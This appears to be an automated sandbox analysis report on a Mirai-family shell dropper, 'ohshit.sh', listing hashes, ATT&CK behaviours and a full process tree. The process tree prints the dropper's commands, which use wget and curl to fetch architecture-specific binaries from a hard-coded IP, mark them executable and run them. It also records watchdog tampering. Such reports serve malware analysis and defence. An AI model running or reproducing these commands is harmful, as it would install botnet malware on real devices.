Analysis
-
max time kernel
139s -
max time network
143s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
02-01-2025 04:21
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
ed9afc8adb1a34f93090873f6b76ec07
-
SHA1
13b5f418f63a32c61e493995e10e3baa0b02caab
-
SHA256
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091
-
SHA512
3ef263bf7ef4cadcc3587d3ef891289cb051087c9d125a74fc8f34f16cda89ca79c2a5ae6f2d0edee3f87855de37af4a594779d6d0d332beade0654e102bd049
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 767 chmod 790 chmod 816 chmod 821 chmod 835 chmod 684 chmod 841 chmod 847 chmod 811 chmod 829 chmod 755 chmod 709 chmod 723 chmod 737 chmod 695 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 686 WTF /tmp/WTF 696 WTF /tmp/WTF 711 WTF /tmp/WTF 725 WTF /tmp/WTF 739 WTF /tmp/WTF 757 WTF /tmp/WTF 768 WTF /tmp/WTF 791 WTF /tmp/WTF 812 WTF /tmp/WTF 817 WTF /tmp/WTF 822 WTF /tmp/WTF 830 WTF /tmp/WTF 836 WTF /tmp/WTF 842 WTF /tmp/WTF 848 WTF -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/611/cmdline WTF File opened for reading /proc/648/cmdline WTF File opened for reading /proc/658/cmdline WTF File opened for reading /proc/792/cmdline WTF File opened for reading /proc/853/cmdline WTF File opened for reading /proc/877/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/590/cmdline WTF File opened for reading /proc/self/exe WTF File opened for reading /proc/610/cmdline WTF File opened for reading /proc/825/cmdline WTF File opened for reading /proc/860/cmdline WTF File opened for reading /proc/875/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/865/cmdline WTF File opened for reading /proc/871/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/606/cmdline WTF File opened for reading /proc/858/cmdline WTF File opened for reading /proc/877/cmdline WTF File opened for reading /proc/self/exe WTF File opened for reading /proc/825/cmdline WTF File opened for reading /proc/610/cmdline WTF File opened for reading /proc/654/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/871/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/653/cmdline WTF File opened for reading /proc/655/cmdline WTF File opened for reading /proc/867/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/655/cmdline WTF File opened for reading /proc/658/cmdline WTF File opened for reading /proc/839/cmdline WTF File opened for reading /proc/608/cmdline WTF File opened for reading /proc/851/cmdline WTF File opened for reading /proc/858/cmdline WTF File opened for reading /proc/862/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/867/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/656/cmdline WTF File opened for reading /proc/865/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/860/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/648/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/673/cmdline WTF File opened for reading /proc/611/cmdline WTF File opened for reading /proc/794/cmdline WTF File opened for reading /proc/853/cmdline WTF File opened for reading /proc/869/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/873/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 693 curl 694 cat 689 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wind.x86 curl File opened for modification /tmp/wind.arc curl File opened for modification /tmp/wind.arm wget File opened for modification /tmp/wind.arm7 wget File opened for modification /tmp/wind.mpsl wget File opened for modification /tmp/wind.arm6 wget File opened for modification /tmp/wind.spc curl File opened for modification /tmp/wind.sh4 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/wind.mips wget File opened for modification /tmp/wind.i468 curl File opened for modification /tmp/wind.arm5 curl File opened for modification /tmp/wind.spc wget File opened for modification /tmp/wind.x86 wget File opened for modification /tmp/wind.arc wget File opened for modification /tmp/wind.x86_64 curl File opened for modification /tmp/wind.ppc curl File opened for modification /tmp/wind.i686 curl File opened for modification /tmp/wind.mpsl curl File opened for modification /tmp/wind.sh4 wget File opened for modification /tmp/wind.mips curl File opened for modification /tmp/wind.arm5 wget File opened for modification /tmp/wind.arm7 curl File opened for modification /tmp/wind.m68k curl File opened for modification /tmp/wind.ppc wget File opened for modification /tmp/wind.m68k wget File opened for modification /tmp/wind.arm curl File opened for modification /tmp/wind.arm6 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:656 -
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:659
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:671
-
-
/bin/catcat wind.x862⤵PID:683
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:686
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:689
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:693
-
-
/bin/catcat wind.mips2⤵
- System Network Configuration Discovery
PID:694
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:696
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:698
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:699
-
-
/bin/catcat wind.arc2⤵PID:708
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:711
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i4682⤵PID:713
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/catcat wind.i4682⤵PID:722
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.i468 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:725
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i6862⤵PID:727
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/catcat wind.i6862⤵PID:736
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:739
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x86_642⤵PID:740
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/catcat wind.x86_642⤵PID:753
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:758
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/catcat wind.mpsl2⤵PID:766
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:768
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:770
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/catcat wind.arm2⤵PID:788
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:791
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:795
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/catcat wind.arm52⤵PID:810
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:812
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:813
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/catcat wind.arm62⤵PID:815
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Reads runtime system information
PID:817
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:818
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/catcat wind.arm72⤵PID:820
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:822
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:826
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/catcat wind.ppc2⤵PID:828
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:832
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/catcat wind.spc2⤵PID:834
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:836
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:838
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/catcat wind.m68k2⤵PID:840
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:842
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:844
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/catcat wind.sh42⤵PID:846
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-b89835efbaf0484f9a11faa564101d3c-systemd-timedated.service-vLXGLR wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:848
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5d70a9269f912109afaeec442fb967ce6
SHA10d89ccf6cb68f4d5b5f5a29d7f5de04984017b21
SHA2565645309e550ef9e1afad4a0da0f577a3be054aec87122317d8a0a677d47496ab
SHA51259817f04c9902c892b91469b8448431a641ea9e7fcc9fa9e87e317fdee1919d9a063f8bfc88fe90f9e9c40a3362ee2e5611f385c819e21ead39ea6148026e275
-
Filesize
105KB
MD5ea6615b985e2ddd30d65e1293058ddd9
SHA13890c332e3d2167f7a5e279135843d6905324d6b
SHA256c16826f971473f4fa6c23a50c745e747eddc9d7a1e026b0613bb1d2ed24f6c52
SHA512975d87a0c7b876d1fa3c1d832b7cef130e6e32052b9ea90bddc166709a4c1ad3d51f3e60c7120b7b4c15b1829e5d465cbc99bac53efa185201a648113c38f9fc
-
Filesize
217B
MD5b5c5bc11ee843c629fe4dc7b16d9e3c8
SHA1b4f2fc81c39d2c053c55ee06a161655f6546a372
SHA25640e81787af6d49bfd5ff0dd8a740f823899d31ddf509e41b10165b13a8cc6e39
SHA512fe3c0c15734685ad54a0068e56cd4247e7cf4716257d25e1916fc69e2c0d7a490166b3802339fff264e3e4ef86d2d4c156f5866eb931e99dce15ad64c96f1a16
-
Filesize
217B
MD57996ac0d48cf7290dc39acdf4c6cbe78
SHA16949f5ef62883990e34538ee5bfdab36b5ddddde
SHA25696db2cd9e9a66997acbc90e8f591e6b1696bb47500d1d07db2d20e3c92de70a8
SHA5120eb9e26445b177be128aa076110ff2d3488641347c17eef3f2e44b50bb9fe18f4c7fa10cccf2985801fbfd5fcc5c163cf141452850927aa58f623737a9d9488a
-
Filesize
57KB
MD542d86ec69889e6fc6c2709a571d72f24
SHA163a111cf7f0be7930592de0255397594d983c27e
SHA2568aff3837c290a26986a2b1b180a1e8d5d8480a64cfa3b9d6cb0c40fbe8d07f0b
SHA5129067a819685cb60c768808d6e19de31bd7ed9b33d705fe68be3ea9f2f5b1912d8b3ac5252036bb46f033a72378e4bc7c09872972ed4b26d9cb5fbdd422e6d668
-
Filesize
20KB
MD52696d2b99111e232d78a0c9678a3e154
SHA119933c0b1d0b81348c862aaedbda11087b87c874
SHA2563cd86a5cc82976251f617c7ca32d6d0fa5e757a4489f0e60dd1cccff28f8b379
SHA51267a9bd12fe8499665fe2a4ae772f4685744a00bfec1452577236f626ddbd8087956609673a78b514a6e438538f815242c98dff15b83c1b8f4302130ea818b8bb